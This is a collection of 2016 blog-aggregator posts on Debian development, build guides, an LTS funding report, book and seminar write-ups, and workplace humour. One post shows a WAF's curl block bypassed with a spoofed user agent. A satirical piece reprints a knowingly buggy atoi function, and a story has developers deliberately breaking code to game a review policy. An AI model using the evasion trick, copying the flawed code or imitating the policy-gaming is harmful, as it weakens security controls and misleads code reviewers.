... who have registered with our GitLab server.

$ git clone git@git.arctica-project.org:nx-X11-rebase/build.git .
$ bash populate.sh sources-devs.lst
$ ./buildit.sh

You will find the built tree in the _install/ sub-directory.

The related git repositories are in the repos/ sub-directory. All repos modified for NX have been cloned from the Arctica Project's GitLab server via SSH. Thus, you as a developer can commit changes on those repos and push back your changes to the GitLab server.

Required tools for building

Debian/Ubuntu and alike

  • build-essential
  • automake
  • gawk
  • git
  • pkg-config
  • libtool
  • libz-dev
  • libjpeg-dev
  • libpng-dev

In a one-liner command:

$ sudo apt-get install build-essential automake gawk git pkg-config libtool libz-dev libjpeg-dev libpng-dev

Fedora

If someone tries this out in a clean Fedora chroot environment, please let us know about build dependent packages.

openSUSE

If someone tries this out in a clean openSUSE chroot environment, please let us know about build dependent packages.

Testing the built nxagent and nxproxy

The tests/ subdir contains some scripts which can be used to test the compile results.

  • run-nxagent runs an nxagent and starts an nxproxy connection to it (do this as normal non-root user):
    $ tests/run-nxagent
    $ export DISPLAY=:9
    # launch e.g. MATE desktop environment on Debian, adapt session type and Xsession startup to your system / distribution
    $ STARTUP=mate-session /etc/X11/Xsession
    
  • run-nxproxy2nxproxy-test connects to nxproxys using the nx compression protocol:
    $ tests/run-nxproxy2nxproxy-test
    $ export DISPLAY=:8
    # launch e.g. xterm and launch other apps from within that xterm process
    $ xterm &
    
  • more to come...

Notes on required X.org changes (NX_MODIFICATIONS)

For this build workflow to work, we (i.e. mostly Ulrich Sibiller) had to work several NoMachine patches into original X.org 7.0 code. Here is a list of modified X11 components with URLs pointing to the branch containing those changes:

xkbdata                            xorg/data/xkbdata                       rebasenx  1.0.1     https://git.arctica-project.org/nx-X11-rebase/xkbdata.git
libfontenc                         xorg/lib/libfontenc                     rebasenx  1.0.1     https://git.arctica-project.org/nx-X11-rebase/libfontenc.git
libSM                              xorg/lib/libSM                          rebasenx  1.0.0     https://git.arctica-project.org/nx-X11-rebase/libSM.git
libX11                             xorg/lib/libX11                         rebasenx  1.0.0     https://git.arctica-project.org/nx-X11-rebase/libX11.git
libXau                             xorg/lib/libXau                         rebasenx  1.0.0     https://git.arctica-project.org/nx-X11-rebase/libXau.git
libXfont                           xorg/lib/libXfont                       rebasenx  1.3.1     https://git.arctica-project.org/nx-X11-rebase/libXfont.git
libXrender                         xorg/lib/libXrender                     rebasenx  0.9.0.2   https://git.arctica-project.org/nx-X11-rebase/libXrender.git
xtrans                             xorg/lib/libxtrans                      rebasenx  1.0.0     https://git.arctica-project.org/nx-X11-rebase/libxtrans.git
kbproto                            xorg/proto/kbproto                      rebasenx  1.0.2     https://git.arctica-project.org/nx-X11-rebase/kbproto.git
xproto                             xorg/proto/xproto                       rebasenx  7.0.4     https://git.arctica-project.org/nx-X11-rebase/xproto.git
xorg-server                        xorg/xserver                            rebasenx  1.0.1     https://git.arctica-project.org/nx-X11-rebase/xserver.git
mesa                               mesa/mesa                               rebasenx  6.4.1     https://git.arctica-project.org/nx-X11-rebase/mesa.git

Credits

Nearly all of this has been achieved by Ulrich Sibiller. Thanks a lot for giving your time and energy to that. As the rebasing of NXv3 is currently a funded project supported by the Qindel Group, we are currently negotiating ways of monetarily appreciating Ulrich's intensive work on this. Thanks a lot, once more!!!

Feedback

If anyone of you feels like trying out the test build as described above, please consider signing up with the Arctica Project's GitLab server and reporting your issues there directly (against the repository nx-X11-rebase/build). Alternatively, feel free to contact us on IRC (Freenode): #arctica or subscribe to our developers' mailing list. Thank you.

light+love
Mike Gabriel

Planet DebianRaphaël Hertzog: Freexian’s report about Debian Long Term Support, April 2016

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In April, 116.75 work hours have been dispatched among 9 paid contributors. Their reports are available:

  • Antoine Beaupré did 16h.
  • Ben Hutchings did 12.25 hours (out of 15 hours allocated + 5.50 extra hours remaining, he returned the remaining 8.25h to the pool).
  • Brian May did 10 hours.
  • Chris Lamb did nothing (instead of the 16 hours he was allocated, his hours have been redispatched to other contributors over May).
  • Guido Günther did 2 hours (out of 8 hours allocated + 3.25 remaining hours, leaving 9.25 extra hours for May).
  • Markus Koschany did 16 hours.
  • Santiago Ruano Rincón did 7.50 hours (out of 12h allocated + 3.50 remaining, thus keeping 8 extra hours for May).
  • Scott Kitterman posted a report for 6 hours made in March but did nothing in April. His 18 remaining hours have been returned to the pool. He decided to stop doing LTS work for now.
  • Thorsten Alteholz did 15.75 hours.

Many contributors did not use all their allocated hours. This is partly explained by the fact that in April Wheezy was still under the responsibility of the security team and they were not able to drive updates from start to finish.

In any case, this means that they have more hours available over May and since the LTS period started, they should hopefully be able to make a good dent in the backlog of security updates.

Evolution of the situation

The number of sponsored hours reached a new record with 132 hours per month, thanks to two new gold sponsors (Babiel GmbH and Plat’Home). Plat’Home’s sponsorship was aimed to help us maintain Debian 7 Wheezy on armel and armhf (on top of already supported amd64 and i386). Hopefully the trend will continue so that we can reach our objective of funding the equivalent of a full-time position.

The security tracker currently lists 45 packages with a known CVE and the dla-needed.txt file lists 44 packages awaiting an update.

This is a bit more than the 15-20 open entries that we used to have at the end of the Debian 6 LTS period.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

Planet Linux AustraliaBinh Nguyen: More PSYOPS, Social Systems, and More

- I think that most people would agree that the best social systems revolve around the idea that we have fair and just laws. If the size of the security apparatus exceeds a certain point (which seems to be happening in a lot of places) are we certain that we have the correct laws and societal laws in place? If they can't convince through standard argumentation then the policy is probably not

Worse Than FailureCodeSOD: Unstandard Lib

One of the hallmarks of “bad code” is when someone reinvents the wheel. In many Code SODs, we show code that could be replaced with a one-line call to a built in, standard library.

That’s one of the the advantages to a high-level language operating on modern hardware. Andrew doesn’t live in high-level land. He does embedded systems programming, often on platforms that don’t have conveniences like “standard libraries”, and so they end up reinventing the wheel from time to time.

For example, a third party wrote them some software. Among other things, they needed to implement their own versions of things like trigonometric functions, random functions, square root, and so on- including atoi- a function for converting arrays of characters to integers. Andrew was called upon to port this software to slightly different hardware.

In the header file, a comment promised that their atoi implementation was “compatible with ANSI atoi”. The implementation, however…

long atoi(char *s)
{
        char *p;
        int l;
        long m=1, t=0;  /* init some vars */
        bool negative = FALSE;

        /* check to see if its negative */
        if(*s == '-') {
                negative = TRUE;
                s++;
        }
        /* not negative is it a number */
        else if(s[0] < '0' || s[0] > '9')
        {
            return 0;
        }

        l = strlen(s);

        p = s + l;                           /* start from end of string */
        /* for each character in the string */
        do {
                p--;                         /* work backwards */
                t += m * (*p - '0');         /* add new value to total, multiplaying by current multiplier (1, 10, 100 etc.) */
                m = (m << 3) + (m << 1);     /* multiply multiplier by 10 (fast m * 10) */
                l--;                         /* decrement the count */
        } while(l);
        if(negative)
                t = -t;                      /* negate if we had a - at the beginning */
        return t;                            /* return the total */
}

The comments came from the original source. Now, this ANSI compatible function has a rather nice boundary check to make sure the first character in either a “-” or a digit. Of course, that’s only the first character. Andrew helpfully provided some example calls that might have unexpected behaviors:

    atoi("2z") == 94
    atoi("-z") == -74 // at least it got the sign right
    atoi("") == [memory violation] // usually triggering a hardware interrupt

For bonus points, their versions of sin and cos can have drift of up to two degrees, and their tan implementation is just a macro of sin/cos, so it has ever larger errors. Their rand function is biased towards zero, and their sqrt implementation uses convergence- it successively approximates the correct result. That much is fine, and pretty normal, but a good sqrt function uses a target epsilon to know when to stop- keep approximating until the error margin shrinks below the point where you care. This particular sqrt function just used a fixed number of iterations, so while sqrt(10) might give you 3.1623, sqrt(10000) gave you 1215.5.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

,

Planet DebianBits from Debian: New Debian Developers and Maintainers (March and April 2016)

The following contributors got their Debian Developer accounts in the last two months:

  • Sven Bartscher (kritzefitz)
  • Harlan Lieberman-Berg (hlieberman)

Congratulations!

LongNowWalter Mischel Seminar Media

This lecture was presented as part of The Long Now Foundation’s monthly Seminars About Long-term Thinking.

The Marshmallow Test: Mastering Self-Control

Monday May 2, 02016 – San Francisco

Video is up on the Mischel Seminar page.

*********************

Audio is up on the Mischel Seminar page, or you can subscribe to our podcast.

*********************

Thinking hot and cool – a summary by Stewart Brand

In the 1960s, Mischel and colleagues at Stanford launched a series of delayed-gratification experiments with young children using a method that later came to be known as “the marshmallow test.” A researcher whom the child knew and trusted, after playing some fun games together, suggested playing a “waiting game.” The researcher explained that the child could have either one or two of the highly attractive treats the child had chosen and was facing (marshmallows, cookies, pretzels)–depending on how long the child waited for them after the researcher left the room. The game was: at any time the child could ring a bell, and the researcher would come back immediately and the child could have one treat. To practice, the researcher left the room, the child rang the bell and the researcher came right back, saying, “You see, you brought me back. Now if you wait for me to come back by myself without ringing the bell or starting to eat a treat you can have both of them!!” The wait might be as long as 15 or 20 minutes. (About one third made it that far.)

The kids varied widely in how long they could stand it before ringing the bell. Mischel emphasizes that the focus of the research was to identify the specific cognitive strategies and mental mechanisms, as well as the developmental changes, that make delay of gratification possible–not to “test” or pigeonhole children. Between the ages of 4 and 6 years, for example, the older kids could delay their gratification longer, apparently as the impulse-overriding “executive function” of their maturing brains kicked in. And in some conditions it was easy for the children to wait, while under other conditions it was very difficult. The research sought to identify the cognitive skills that underlie willpower and long-term thinking and how they can be enhanced.

Longitudinal studies of the tested children suggested that something profound was going on. By the time they were adolescents, the kids who had been able to hold out longer for the bigger reward in some conditions were also likelier to have higher SAT scores, to function better socially, and to manage temptation and stress better. On into their adulthood, they were less likely to show extreme aggression, less likely to over-react if they became anxious about social rejection, and less likely to become obese. For the kids who did not hold out well and took the quick reward, Mischel said the findings suggested that “the inability to delay gratification can have quite serious potential negative effects.” (Mischel cautions that the longitudinal results are only correlations that describe group findings and do not allow accurate predictions for individual children.)

Can “delay ability” be trained? Mischel thinks it can, if we understand how our mind works. He and colleagues postulated a “Hot System” and a “Cool System” in the brain. (They are similar to Daniel Kahneman’s “System 1” and “System 2” in his book Thinking Fast and Slow.) The Hot System (Go!) is: emotional, simple, reflexive, fast, and centered in the amygdala. It develops early in the child and is exacerbated by stress. The Cool System (Know), on the other hand, is: cognitive rather than emotional, complex, reflective, slow, and centered in the frontal lobes and hippocampus. It develops later in the child and is made weaker by stress. In the Hot System the stimulus controls us; in the Cool System we control the stimulus.

You can chill a hot object of desire by representing it to yourself in Cool, abstract terms. Don’t think of the marshmallow as yummy and chewy; imagine it as round and white like a cotton ball. One little girl became patient by pretending she was looking at a picture of a marshmallow and “put a frame around it” in her head. “You can’t eat a picture,” she explained. (Girls were better handling temptation than boys.)

While coolly defusing a temptation, you can also make Hot the delayed consequences of yielding to it. Mischel was a three-pack-a-day smoker ignoring all warnings about cancer until one day he saw a man on a gurney in Stanford Hospital. “His head was shaved, with little green X’s, and his chest was bare, with little green X’s.” A nurse told him the X’s were for where the radiation would be targeted. “I couldn’t shake the image. It made hot the delayed consequences of my smoking.” Mischel kept that image alive in his mind while reframing his cigarettes as sources of poison instead of relief, and he quit.

“If you don’t know how to delay gratification,” he said, “you don’t have a choice. If you do know how, you have a choice.”

Subscribe to our Seminar email list for updates and summaries.

Sociological ImagesThe Trucker, His Downfall, and the US Economy

According to this graphic by NPR, “truck driver” is the most common occupation in most US states:

4

But truck driving isn’t what it used to be. In 1980, truckers made the equivalent of $110,000 annually; today, the average trucker makes $40,000. What happened to this omnipresent American occupation?

At the Atlantic, sociologist Steve Viscelli describes his research on truckers. He took an entry level long-haul trucking job, interviewed workers, and studied its history. He found that the industry had essentially eviscerated worker pay, largely by turning truckers into independent contractors, misleading them about the benefits of this arrangement, and locking them into punitive contracts.

Viscelli argues that few truckers are fully informed as to what it means to be an independent contractor, at least at first. Trucking companies sell them on the idea that they’ll be their own boss and set their own hours, but they don’t emphasize that they will pay significantly more taxes, their own expenses, and the lease on a truck. Viscelli interviews one man who took home the equivalent of 50 cents an hour one week; another week he’d ended up owing the company $100. As independent contractors, he writes, truckers “end up working harder and earning far less than they would otherwise.”

If truckers want to get out of these contracts, the companies can hold their lease over their heads. Truckers sign a years-long contract to lease their truck along with a promise not to work for anyone else. If the contract is violated, the worker is on the hook for the entire lease. This could be tens of thousands of dollars, so the trucker can’t afford to quit. He’s no longer working, in other words, to make money; he’s just working, sometimes for years, to avoid debt.

The decimation of this once strongly middle class job is just one story among many. Add them all up — all of those occupations that no longer provide a middle class income, and the rise of lower paying jobs — and you get the shrinking of the middle class. Since 1970, fewer and fewer Americans qualify as middle income, defined as a household income that is between two-thirds of and double the median, or middle, household income.

You can see it shrink in this graphic by Deseret News using data from the Pew Research Center:

4

Part of the reason is that we have transitioned to an industrial economy to one that offers jobs primarily in service (low paying) and knowledge/information (high paying), but the other part is the restructuring of work to increasingly benefit owners, operators, and investors over workers. As the middle class has been shrinking, the productivity of American workers has been climbing, but the workers haven’t been the beneficiaries of their own work. Instead, employers have just been taking a larger and larger share of the value added that workers produce.

Figure from the Wall Street Journal with data from the Economic Policy Institute:

5

Between 1948 and 1973, productivity and wages increased at close to the same rate (97% and 91% respectively), but between 1973 and 2014, productivity has continued to climb (increasing by 72%), while wages have not (increasing by only 9%).

This is why so many Americans are struggling to stay afloat today. We’ve designed an economy that makes it ever more difficult to land in the middle class. Trucking isn’t the job it used to be, that is, because we aren’t the country we used to be.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on TwitterFacebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianSteinar H. Gunderson: stretch on ODROID XU4

I recently acquired an ODROID XU4. Despite being 32-bit, it's currently at the upper end of cheap SoC-based devboards; it's based on Exynos 5422 (which sits in Samsung Galaxy S5), which means 2 GHz quadcore Cortex-A15 (plus four slower Cortex-A7, in a big.LITTLE configuration), 2 GB RAM, USB 3.0, gigabit Ethernet, a Mali-T628 GPU and eMMC/SD storage. (My one gripe about the hardware is that you can't put on the case lid while still getting access to the serial console.)

Now, since I didn't want it for HTPC or something similar (I wanted a server/router I could carry with me), I didn't care much about the included Ubuntu derivative with all sorts of Samsung modifications, so instead, I went on to see if I could run Debian on it. (Spoiler alert: You can't exactly just download debian-installer and run it.) It turns out there are lots of people who make Debian images, but they're still filled with custom stuff here and there.

In recent times, people have put down heroic efforts to make unified ARM kernels; servers et al can now enumerate hardware using ACPI, while SoCs (such as the XU4) have a “device tree” file (loaded by the bootloader) containing a functional description of what hardware exists and how it's hooked up. And lo and behold, the 4.5.0 “armmp” kernel from stretch boots and mostly works! Well… except for that there's no HDMI output. :-)

There are two goals I'd like to achieve by this exercise: First, it's usually much easier to upgrade things if they are close to mainline. (I wanted support for sch_fq, for instance, which isn't in 3.10, and the vendor kernel is 3.10.) Second, anything that doesn't work in Debian is suddenly exposed pretty harshly, and can be filed bugs for and fixed—which benefits not only XU4 users (if nothing else, because the custom distros have to carry less delta), but usually also other boards as most issues are of a somewhat more generic nature. Yet, the ideal seems to puzzle some of the more seasoned people in the ODROID user groups; I guess sometimes it's nice to come in as a naïve new user. :-)

So far, I've filed bugs or feature requests to the kernel (#823552, #824435), U-Boot (#824356), grub (#823955, #824399), and login (#824391)—and yes, that includes for the aforemented lack of HDMI output. Some of them are already fixed; with some luck, maybe the XU4 can be added next to the other Exynos5 board at the compatibility list for the armmp kernels at some point. :-)

You can get the image at http://storage.sesse.net/debian-xu4/. Be sure to read the README and the linked ODROID forum post.

Worse Than FailureDouble Play

How to play baseball, a manual for boys (1914) (14763970952)

Contracting seemed the best way for Ann-Marie to gain a foothold in the IT industry. She wasn't the best or the brightest, and her CV was heavy on toy languages and light on experience. But if she got a good solid chance, she knew her no-nonsense attitude and general intelligence would endear her to her boss.

Or maybe it would have, if it weren't for Cindy the Project Manager.

Cindy liked to chew gum at work. No, not chew—pop. It was all Ann-Marie could do to keep her face neutral during her onboarding, when Cindy handed over the employee handbook the team lead had asked her to deliver.

"So, like, these are our standards I guess? Whatever, you'll do fine, I'm not even worried."

Once she was gone, however, things started looking up. Unlike the last few places Ann-Marie had contracted, this one had JIRA and used it heavily, requiring all commits to include a JIRA number for tracking purposes. In addition, she was pleasantly surprised to see a QA department, and reasonable handoff practices: to be handed over to QA, the build had to be passing on the CI server, and earmarked as a release candidate. Commit messages were vital for keeping track of items in progress. They had to be descriptive, yet concise, and no more than one commit per JIRA item so that a relationship between tickets and commits could be established and tracked.

Yeah ... I could stay here, Ann-Marie decided. What's a little gum-popping in exchange for a Joel Number this high?

And so, eager to please, she threw herself into her work. On the first day, she closed five JIRA tickets—all small fixes in disparate portions of the application—as she tried to get a feel for the codebase.

"Wow, you like, really know your stuff," Cindy said, stopping by at the end of the day. "Our last guy didn't do anything for four days. This is going to be the best Bug Blitz ever. Well done!"

Ann-Marie stopped for a smoothie on her way home, confident she'd fit right in at this new job.

It was day three before the first incident happened. She was off to another great start, closing two tickets before 10:00 AM. At first, she assumed that was why Cindy was walking over, until she saw the frown on her manager's face.

"So, like, I don't know if you read the handbook, but we have a policy of not closing more than one ticket with the same JIRA number," Cindy said.

"Yeah, right, so you don't have to pick apart commits if you send one feature but not the other. Totally cool, definitely a best practice." Ann-Marie wondered why this was coming up. Had she accidentally broken policy? No, she'd been careful. One change, one commit.

"Right, right. So what's up with 44 and 89?" Cindy asked, rattling off the numbers with a punctuative pop.

"Uh ..." Ann-Marie pulled up the JIRA tab on her machine, rapidly navigating to 89 and skimming over the comments. "Oh, right, 89! That was fixed by the commit I did yesterday for 45. It had the same root cause."

"Riiight ... so they used the same commit," Cindy said.

"No, see?" Ann-Marie said. "Here, 45 was an error when downloading a document, and 89 was a blank document ID in the details for the document. The user couldn't download the document because it was sending them to a URL with a blank ID in it. The reason for that was because the file ID was omitted from the select columns in the database query that was shared between the two. By changing it so the document's file ID was included in that query, I killed two birds with one stone."

"Right, yeah, see, two birds, one commit. We have a strict policy against that. This can't happen again."

Ann-Marie blinked at Cindy. Was she just not getting through? "Surely something like this has happened before?"

Cindy gave her a flat, vacant look. "Not really." Pop. "We cool?" Pop.

"I ... I really don't know what to say here," Ann-Marie replied, flustered. "I mean, I agree with the policy, it makes it easier to roll back if one fix is broken, but this? This is a different situation entirely."

"You'll figure something out." Without waiting for a reply, Cindy turned and walked away.

Wonderful, Ann-Marie groaned inwardly. What do I do now?

Hoping against hope that she was just misunderstanding something, that someone else could enlighten her as to what Cindy's problems were and how to give her what she wanted, Ann-Marie took a walk to Garrett's cube. Garrett was a senior developer, one who'd been useful over the past few days as she'd rooted out a few harder-to-find bugs. Surely he'd run into this issue before. Maybe he'd even have an answer?

"Ooooh, yeah. THAT policy," Garrett began, and Ann-Marie's heart sank. "Cindy gets a little OCD about this stuff. We know exactly what you're talking about. Different developers go about resolving it in different ways. I, personally, simply commit one thing in such a way that 'breaks' the other issue again. Like, in your case, I would have both included the ID column and then intentionally blanked out the ID in the details view for my first commit. That commit gets mapped to the download error JIRA ticket. Then, I commit a second change that undoes the blanked-out ID in the view, that goes to the other ticket. It leaves a sour taste in your mouth, but you get used to it."

Ann-Marie sighed, feeling a headache creeping up on the edges of her temples. "I should have just marked it a duplicate," she mumbled to herself.

"Oh, no, Cindy doesn't like that either." Garrett assured her with a sympathetic look.

"Committed a whitespace change for the second ticket?" Ann-Marie fired back, not even bothering to get her hopes up.

"She reviews every single commit. Not that she's ever been a programmer, but she's taking night classes and has a keen eye for BS. Thankfully not keen enough to catch on to what we're doing with the intentional-breakage strategy, though."

Ann-Marie sighed. "Well, that's me out of ideas."

"Sorry," Garrett replied, a gentle smile on his face. "Sometimes you just have to throw in the towel and find a loophole."

For the duration of the Bug Blitz, Ann-Marie did just that, committing 'accidental' breakages for each duplicate bug—and even, once, for a triplicate ticket.

When the blitz finished and she was offered a permanent position, she politely declined. Stability was overrated.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet DebianRuss Allbery: Review: Gentleman Jole and the Red Queen

Review: Gentleman Jole and the Red Queen, by Lois McMaster Bujold

Series: Vorkosigan #15
Publisher: Baen
Copyright: 2015
Printing: February 2016
ISBN: 1-4767-8122-2
Format: Kindle
Pages: 352

This is very late in the Vorkosigan series, but it's also a return to a different protagonist and a change of gears to a very different type of story. Gentleman Jole and the Red Queen has Cordelia as a viewpoint character for, I believe, the first time since Barrayar, very early in the series. But you would still want to read the intermediate Miles books before this one given the nature of the story Bujold is telling here. It's a very character-centric, very quiet story that depends on the history of all the Vorkosigan characters and the connection the reader has built up with them. I think you have to be heavily invested in this series already to get that much out of this book.

The protagonist shift has a mildly irritating effect: I've read the whole series, but I was still a bit adrift at times because of how long it's been since I read the books focused on Cordelia. I only barely remember the events of Shards of Honor and Barrayar, which lay most of the foundations of this story. Bujold does have the characters retell them a bit, enough to get vaguely oriented, but I'm pretty sure I missed some subtle details that I wouldn't have if the entire series were fresh in memory. (Oh for the free time to re-read all of the series I'd like to re-read.)

Unlike recent entries in this series, Gentleman Jole and the Red Queen is not about politics, investigations, space (or ground) combat, war, or any of the other sources of drama that have shown up over the course series. It's not even about a wedding. The details (and sadly even the sub-genre) are all spoilers, both for this book and for the end of Cryoburn, so I can't go into many details. But I'm quite curious how the die-hard Baen fans would react to this book. It's a bit far afield from their interests.

Gentleman Jole is all about characters: about deciding what one wants to do with one's life, about families and how to navigate them, about boundaries and choices. Choices about what to communicate and what not to communicate, and, partly, about how to maintain sufficient boundaries against Miles to keep his manic energy from bulldozing into things that legitimately aren't any of his business. Since most of the rest of the series is about Miles poking into things that appear to not be his business and finding ways to fix things, it's an interesting shift. It also cast Cordelia in a new light for me: a combination of stability, self-assurance, and careful and thoughtful navigation around others' feelings. Not a lot happens in the traditional plot sense, so one's enjoyment of this book lives or dies on one's investment in the mundane life of the viewpoint characters. It worked for me.

There is also a substantial retcon or reveal about an aspect of Miles's family that hasn't previously been mentioned. (Which term you use depends on whether you think Bujold has had this in mind all along. My money is on reveal.) I suspect some will find this revelation jarring and difficult to believe, but it worked perfectly for me. It felt like exactly the sort of thing that would go unnoticed by the other characters, particularly Miles: something that falls neatly into his blind spots and assumptions, but reads much differently to Cordelia. In general, one of the joys of this book for me is seeing Miles a bit wrong-footed and maneuvered by someone who simply isn't willing to be pushed by him.

One of the questions the Vorkosigan series has been asking since the start is whether anyone can out-maneuver Miles. Ekaterin only arguably managed it, but Gentleman Jole makes it clear that Miles is no match for his mother on her home turf.

This is a quiet and slow book that doesn't feel much like the rest of the series, but it worked fairly well for me. It's not up in the ranks of my favorite books of this series, partly because the way it played out was largely predictable and I never quite warmed to Jole, but Cordelia is delightful and seeing Miles from an outside perspective is entertaining. An odd entry in the series, but still recommended.

Rating: 7 out of 10

,

Planet DebianBits from Debian: What does it mean that ZFS is included in Debian?

Petter Reinholdtsen recently blogged about ZFS availability in Debian. Many people have worked hard on getting ZFS support available in Debian and we would like to thank everyone involved in getting to this point and explain what ZFS in Debian means.

The landing of ZFS in the Debian archive was blocked for years due to licensing problems. Finally, the inclusion of ZFS was announced slightly more than a year ago, on April 2015 by the DPL at the time, Lucas Nussbaum who wrote "We received legal advice from Software Freedom Law Center about the inclusion of libdvdcss and ZFS in Debian, which should unblock the situation in both cases and enable us to ship them in Debian soon.". In January this year, the following DPL, Neil McGovern blogged with a lot of more details about the legal situation behind this and summarized it as "TLDR: It’s going in contrib, as a source only dkms module."

ZFS is not available exactly in Debian, since Debian is only what's included in the "main" section archive. What people really meant here is that ZFS code is now in included in "contrib" and it's available for users using DKMS.

Many people also mixed this with Ubuntu now including ZFS. However, Debian and Ubuntu are not doing the same, Ubuntu is shipping directly pre-built kernel modules, something that is considered to be a GPL violation. As the Software Freedom Conservancy wrote "while licensed under an acceptable license for Debian's Free Software Guidelines, also has a default use that can cause licensing problems for downstream Debian users".

Planet DebianSven Hoexter: Failing with F5: ASM default ruleset vs curl

Not sure what to say on days when the default ruleset of a "web application firewall" denies access for curl, and the circumvention is as complicated as:

alias curl-vs-asm="curl -A 'Mozilla'"

It starts to feel like wasting my lifetime when I see something like that. Otherwise I like my job (that's without irony!).

Update: Turns out it's even worse. They specifically block curl. Even

curl -A 'A' https://wherever-asm-is-used.example

works.

Planet DebianNorbert Preining: Foreigners in Japan are evil …

…at least what Tokyo Shinjuku ward belives. They have put out a very nice brochure about how to behave as a foreigner in Japan: English (local copy) and Japanese (local copy). Nothing in there is really bad, but the tendency is so clear that it makes me think – what on earth do you believe we are doing in this country?
foreigners

Now what is so strange on that? And if you have never lived in Japan you will probably not understand. But reading through this pamphlet I felt like a criminal from the first page on. If you don’t want to read through it, here a short summary:

  • The first four pages (1-4) deal with manner, accompanying penal warnings for misbehavior.
  • Pages 5-16 deal with criminal records, stating the amount of imprisonment and fines for strange delicti.
  • Pages 17-19 deal with residence card, again paired with criminal activity listings and fines.
  • Pages 20-23 deal with reporting obligations, again ….
  • And finally page 24 gives you phone numbers for accidents, fires, injury, and general information.

So if you count up, we have 23 pages of warnings, and 1 (as in *one*) page of practical information. Do I need to add more about how we foreigners are considered in Japan?

Just a few points about details:

  • In the part on manner, not talking on the phone in public transport is mentioned – I have to say, after many years here I am still waiting to see the first foreigner talking on the phone loudly, while Japanese regularly chat away at high volume.
  • Again in the manner section, don’t make noise in your flat – well, I lived 3 years in an apartment where the one below me enjoyed playing loud music in the car till late in the night, as well as moving furniture at 3am.
  • Bicycle riding – ohhhh, bicycle riding – those 80+ people meandering around the street, and the school kids driving 4 next to each other. But hey, we foreigners are required to do differently. Not that any police officer ever stopped a Japanese school kid for that …
  • I just realized that I was doing illegal things for long time – withdrawing money using someone else’s cash card! Damned, it was my wife’s, but still, too bad 🙁

I accept the good intention of the Shinjuku ward to bring forth a bit of warnings and guidance. But the way it was done – it speaks volumes about how we foreigners are treated – second class.

Planet DebianJonathan Dowland: Announcement

It has become a bit traditional within Debian to announce these things in a geeky manner, so for now

# ed -p: /etc/exim4/virtual/dow.land
:a
holly: :fail: reserved for future use
.
:wq
99

More soon!

Planet DebianDirk Eddelbuettel: Rcpp 0.12.5: Yet another one

The fifth update in the 0.12.* series of Rcpp has arrived on the CRAN network for GNU R a few hours ago, and was just pushed to Debian. This 0.12.5 release follows the 0.12.0 release from late July, the 0.12.1 release in September, the 0.12.2 release in November, the 0.12.3 release in January, and the 0.12.4 release in March --- making it the ninth release at the steady bi-montly release frequency. This release is one again more of a maintenance release addressing a number of small bugs, nuisances or documentation issues without adding any major new features.

Rcpp has become the most popular way of enhancing GNU R with C or C++ code. As of today, 662 packages on CRAN depend on Rcpp for making analytical code go faster and further. That is up by almost fifty packages from the last release in late March!

And as during the last few releases, we have first-time committers. we have new first-time contributors. Sergio Marques helped to enable compilation on Alpine Linux (with its smaller libc variant). Qin Wenfeng helped adapt for Windows builds under R 3.3.0 and the long-awaited new toolchain. Ben Goodrich fixed a (possibly ancient) Rcpp Modules bug he encountered when working with rstan. Other (recurrent) contributor Dan Dillon cleaned up an issue with Nullable and strings. Rcpp Core team members Kevin and JJ took care of small build nuisance on Windows, and I added in a new helper function, updated the skeleton generator and (finally) formally deprecated loadRcppModule() for which loadModule() has been preferred since around R 2.15 or so. More details and links are below.

Changes in Rcpp version 0.12.5 (2016-05-14)

  • Changes in Rcpp API:

    • The checks for different C library implementations now also check for Musl used by Alpine Linux (Sergio Marques in PR #449).

    • Rcpp::Nullable works better with Rcpp::String (Dan Dillon in PR #453).

  • Changes in Rcpp Attributes:

    • R 3.3.0 Windows with Rtools 3.3 is now supported (Qin Wenfeng in PR #451).

    • Correct handling of dependent file paths on Windows (use winslash = "/").

  • Changes in Rcpp Modules:

    • An apparent race condition in Module loading seen with R 3.3.0 was fixed (Ben Goodrich in #461 fixing #458).

    • The (older) loadRcppModules() is now deprecated in favour of loadModule() introduced around R 2.15.1 and Rcpp 0.9.11 (PR #470).

  • Changes in Rcpp support functions:

    • The Rcpp.package.skeleton() function was again updated in order to create a DESCRIPTION file which passes R CMD check without notes. warnings, or error under R-release and R-devel (PR #471).

    • A new function compilerCheck can test for minimal g++ versions (PR #474).

Thanks to CRANberries, you can also look at a diff to the previous release. As always, even fuller details are on the Rcpp Changelog page and the Rcpp page which also leads to the downloads page, the browseable doxygen docs and zip files of doxygen output for the standard formats. A local directory has source and documentation too. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

,

Planet DebianAntoine Beaupré: Long delays posting Debian Planet Venus

For the last few months, it seems that my posts haven't been reaching the Planet Debian aggregator correctly. I timed the last two posts and they both arrived roughly 10 days late in the feed.

SNI issues

At first, I suspected I was a victim of the SNI bug in Planet Venus: since it is still running in Python 2.7 and uses httplib2 (as opposed to, say, Requests), it has trouble with sites running under SNI. In January, there were 9 blogs with that problem on Planet. When this was discussed elsewhere in February, there were now 18, and then 21 reported in March. With everyone enabling (like me) Let's Encrypt on their website, this number is bound to grow.

I was able to reproduce the Debian Planet setup locally to do further tests and ended up sending two (unrelated) patches to the Debian bug tracker against Planet Venus, the software running Debian planet. In my local tests, I found 22 hosts with SNI problems. I also posted some pointers on how the code could be ported over to the more modern Requests and Cachecontrol modules.

Expiry issues

However, some of those feeds were working fine on philp, the host I found was running as the Planet Master. Even more strange, my own website was working fine!

INFO:planet.runner:Feed https://anarc.at/tag/debian-planet/index.rss unchanged

Now that was strange: why was my feed fetched, but noted as unchanged? For that, I found that there was a FAQ question buried down in the PlanetDebian wikipage which explicitly said that Planet obeys Expires headers diligently and will not get new content again if the headers say they did. Skeptical, I looked my own headers and, ta-da! they were way off:

$ curl -v https://anarc.at/tag/debian-planet/index.rss 2>&1 | egrep  '< (Expires|Date)'
< Date: Sat, 14 May 2016 19:59:28 GMT
< Expires: Sat, 28 May 2016 19:59:28 GMT

So I lowered the expires timeout on my RSS feeds to 3 hours:

